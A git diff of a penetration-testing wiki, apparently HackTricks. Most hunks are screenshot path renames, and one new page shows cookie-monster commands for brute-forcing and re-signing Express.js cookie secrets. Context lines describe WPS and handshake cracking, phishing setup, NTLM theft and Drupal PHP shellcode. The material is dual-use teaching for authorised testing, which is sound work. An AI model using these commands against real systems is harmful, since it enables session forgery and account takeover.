dc4019cda..e5c2f2faf 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -282,7 +282,7 @@ Some really bad implementations allowed the Null PIN to connect (very weird also All the proposed WPS attacks can be easily performed using _**airgeddon.**_ -![](<../../.gitbook/assets/image (124).png>) +![](<../../.gitbook/assets/image (201) (1).png>) * 5 and 6 lets you try **your custom PIN** (if you have any) * 7 and 8 perform the **Pixie Dust attack** @@ -370,7 +370,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening: -![](<../../.gitbook/assets/image (172) (1).png>) +![](<../../.gitbook/assets/image (172) (1) (1).png>) Once the handshake is captured you can **crack** it with `aircrack-ng`: diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md index bda2afabc..7c4b4b23c 100644 --- a/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/generic-methodologies-and-resources/phishing-methodology/README.md @@ -343,7 +343,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors -![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (6).png>) +![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png>) {% hint style="info" %} It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\ @@ -384,7 +384,7 @@ Note that **in order to increase the credibility of the email**, it's recommende * Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response. * Try to contact **some valid discovered** email and wait for the response -![](<../../.gitbook/assets/image (67) (1).png>) +![](<../../.gitbook/assets/image (393).png>) {% hint style="info" %} The Email Template also allows to **attach files to send**. If you would also like to steal NTLM challenges using some specially crafted files/documents [read this page](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md). diff --git a/linux-hardening/privilege-escalation/linux-capabilities.md b/linux-hardening/privilege-escalation/linux-capabilities.md index 36781f548..1c9e6d9b7 100644 --- a/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/linux-hardening/privilege-escalation/linux-capabilities.md @@ -957,7 +957,7 @@ int main(int argc,char* argv[] ) I exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command: {% endhint %} -![](<../../.gitbook/assets/image (407) (2).png>) +![](<../../.gitbook/assets/image (407) (1).png>) **The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) @@ -1539,7 +1539,7 @@ In addition, this capability also allows the process to view `dmesg` output, if **Other references**: * [https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux](https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux) -* [https://www.schutzwerk.com/en/43/posts/linux\_container\_capabilities/#:\~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20.](https://www.schutzwerk.com/en/43/posts/linux\_container\_capabilities/#:\~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20.) +* [https://www.schutzwerk.com/en/43/posts/linux\_container\_capabilities/#:\~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20.](https://www.schutzwerk.com/en/43/posts/linux\_container\_capabilities/) * [https://linux-audit.com/linux-capabilities-101/](https://linux-audit.com/linux-capabilities-101/) * [https://www.linuxjournal.com/article/5737](https://www.linuxjournal.com/article/5737) * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module) diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture.md index ceb2d3385..0a9b089f4 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture.md @@ -207,7 +207,7 @@ The offsets of any constructors are held in the **\_\_mod\_init\_func** section The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type. -![](<../../.gitbook/assets/image (555).png>) +![](<../../.gitbook/assets/image (507) (3).png>) **Get the info** diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md index fe47a6d6b..5844c20f6 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -126,7 +126,7 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi 2. The JSON payload is encrypted using Absinthe (**`NACSign`**) 3. All requests over HTTPs, built-in root certificates are used -![](<../../../.gitbook/assets/image (566) (1).png>) +![](<../../../.gitbook/assets/image (566).png>) The response is a JSON dictionary with some important data like: @@ -146,7 +146,7 @@ The response is a JSON dictionary with some important data like: * Signed using the **device identity certificate (from APNS)** * **Certificate chain** includes expired **Apple iPhone Device CA** -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) ### Step 6: Profile Installation diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index 5280c111d..7100f1d35 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -384,7 +384,7 @@ _Note that you can **omit the package name** and the mobile will automatically c In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](<../../.gitbook/assets/image (436) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (436) (1) (1).png>) **Sensitive info** diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md index f596ff3ab..06744c37d 100644 --- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -241,7 +241,7 @@ In this case you could try to abuse the functionality creating a web with the fo In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](<../../.gitbook/assets/image (436) (1) (1).png>) +![](<../../.gitbook/assets/image (436) (1) (1) (1).png>) Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links). diff --git a/mobile-pentesting/android-app-pentesting/apk-decompilers.md b/mobile-pentesting/android-app-pentesting/apk-decompilers.md index 0f02d0ef8..0ba496d90 100644 --- a/mobile-pentesting/android-app-pentesting/apk-decompilers.md +++ b/mobile-pentesting/android-app-pentesting/apk-decompilers.md @@ -52,7 +52,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s **Only for Windows.** -![](<../../.gitbook/assets/image (207) (1).png>) +![](<../../.gitbook/assets/image (207) (1) (1).png>) ## [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases) diff --git a/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md index 6a4ab9abe..fd8cf6bb1 100644 --- a/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md +++ b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md @@ -228,7 +228,7 @@ However there are **a lot of different command line useful options** that you ca First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_ -![](<../../.gitbook/assets/image (367) (1).png>) +![](<../../.gitbook/assets/image (367).png>) **Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\ For example you can run it like: diff --git a/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 6b167e9bf..94f302b92 100644 --- a/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -77,7 +77,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/ You should also check the **ContentProvider code** to search for queries: -![](<../../../.gitbook/assets/image (121) (1) (1).png>) +![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>) Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method: @@ -94,7 +94,7 @@ When checking the code of the Content Provider **look** also for **functions** n ![](<../../../.gitbook/assets/image (187).png>) -![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>) Because you will be able to call them diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md index bcb702f5d..2617e9d3f 100644 --- a/mobile-pentesting/ios-pentesting/README.md +++ b/mobile-pentesting/ios-pentesting/README.md @@ -715,7 +715,7 @@ You can collect console logs through the Xcode **Devices** window as follows: 5. Reproduce the problem. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. -![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png>) +![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md index c101e0b66..f68f50095 100644 --- a/network-services-pentesting/27017-27018-mongodb.md +++ b/network-services-pentesting/27017-27018-mongodb.md @@ -101,7 +101,7 @@ grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not Mongo Object IDs are **12-byte hexadecimal** strings: -![](../.gitbook/assets/id-and-objectids-in-mongodb.png) +![](../.gitbook/assets/id-and-ObjectIds-in-MongoDB.png) For example, here’s how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019 diff --git a/network-services-pentesting/623-udp-ipmi.md b/network-services-pentesting/623-udp-ipmi.md index 8c11f172a..f866cae51 100644 --- a/network-services-pentesting/623-udp-ipmi.md +++ b/network-services-pentesting/623-udp-ipmi.md @@ -142,7 +142,7 @@ Once administrative access to the BMC is obtained, there are a number of methods ![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png) -![](<../.gitbook/assets/image (202) (1).png>) +![](<../.gitbook/assets/image (202) (2).png>) ## Exploiting the BMC from the Host diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md index 7866b72eb..a04ea0c88 100644 --- a/network-services-pentesting/pentesting-snmp/README.md +++ b/network-services-pentesting/pentesting-snmp/README.md @@ -19,7 +19,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -44,7 +44,7 @@ Scalar objects define a single object instance whereas tabular objects define mu **OIDs** stands for **O**bject **Id**entifiers. **OIDs uniquely identify managed objects in a MIB hierarchy**. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations.\ **Vendors define private branches including managed objects for their own products.** -![](../../.gitbook/assets/SNMP\_OID\_MIB\_Tree.png) +![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png) You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\ There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...) @@ -245,7 +245,7 @@ Entry_5: ``` {% hint style="danger" %} -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index 1ff036545..a1e6b54a6 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md @@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} - + **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! @@ -419,7 +419,7 @@ Entry_11: ``` {% hint style="danger" %} -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} diff --git a/network-services-pentesting/pentesting-web/drupal.md b/network-services-pentesting/pentesting-web/drupal.md index a0f79d12c..8a7672773 100644 --- a/network-services-pentesting/pentesting-web/drupal.md +++ b/network-services-pentesting/pentesting-web/drupal.md @@ -42,7 +42,7 @@ Accessing _/user/\_ you can see the number of existing users, in this ca ![](<../../.gitbook/assets/image (257).png>) -![](<../../.gitbook/assets/image (227) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (227) (1) (1).png>) ## Hidden pages enumeration @@ -67,7 +67,7 @@ You need the **plugin php to be installed** (check it accessing to _/modules/php Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_ -![](<../../.gitbook/assets/image (252).png>) +![](<../../.gitbook/assets/image (247) (1).png>) Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_ diff --git a/network-services-pentesting/pentesting-web/graphql.md b/network-services-pentesting/pentesting-web/graphql.md index a08e5a321..2e60db045 100644 --- a/network-services-pentesting/pentesting-web/graphql.md +++ b/network-services-pentesting/pentesting-web/graphql.md @@ -86,11 +86,11 @@ Now that we know which kind of information is saved inside the database, let's t In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object. -![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png) +![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>) Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below: -![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png) +![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>) You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query: @@ -213,7 +213,7 @@ Or even **relations of several different objects using aliases**: In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case): -![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png) +![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>) For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**. @@ -273,7 +273,7 @@ Below you can find the simplest demonstration of an application authentication r As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token. -![](<../../.gitbook/assets/image (119) (1).png>) +![](<../../.gitbook/assets/image (119) (2).png>) ## CSRF in GraphQL diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md index a9589f741..6f7b18dee 100644 --- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -338,7 +338,7 @@ C:\xampp\tomcat\conf\server.xml If you see an error like the following one: -![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10).png>) +![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png>) It means that the server **didn't receive the correct domain name** inside the Host header.\ In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. diff --git a/network-services-pentesting/pentesting-web/nodejs-express.md b/network-services-pentesting/pentesting-web/nodejs-express.md new file mode 100644 index 000000000..024515b2d --- /dev/null +++ b/network-services-pentesting/pentesting-web/nodejs-express.md @@ -0,0 +1,37 @@ +# NodeJS Express + +## Cookie Signature + +The tool [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) is a utility for automating the testing and re-signing of Express.js cookie secrets. + +### Single cookie with a specific name + +``` +$ cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session +``` + +### Custom wordlist + +``` +$ cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst +``` + +### Test multiple cookies using batch mode + +``` +$ cookie-monster -b -f cookies.json +``` + +### Test multiple cookies using batch mode with a custom wordlist + +``` +$ cookie-monster -b -f cookies.json -w custom.lst +``` + +### Encode and sign a new cookie + +if you know the secret you can sign a the cookie. + +``` +$ cookie-monster -e -f new_cookie.json -k secret +``` diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md index f0cd58354..80ea62b7f 100644 --- a/network-services-pentesting/pentesting-web/wordpress.md +++ b/network-services-pentesting/pentesting-web/wordpress.md @@ -179,7 +179,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one * ``` -![](../../.gitbook/assets/1\_jauyizf8zjdggb7ocszc-g.png) +![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png) If you get **faultCode** with a value **greater** then **0** (17), it means the port is open. @@ -205,7 +205,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>) ![](<../../.gitbook/assets/image (102).png>) diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md index 1559a42ba..bbf4bbfec 100644 --- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md @@ -219,7 +219,7 @@ For more info about this examples check [https://shabarkin.medium.com/1-click-rc If `contextIsolation` set to false you can try to use \ (similar to \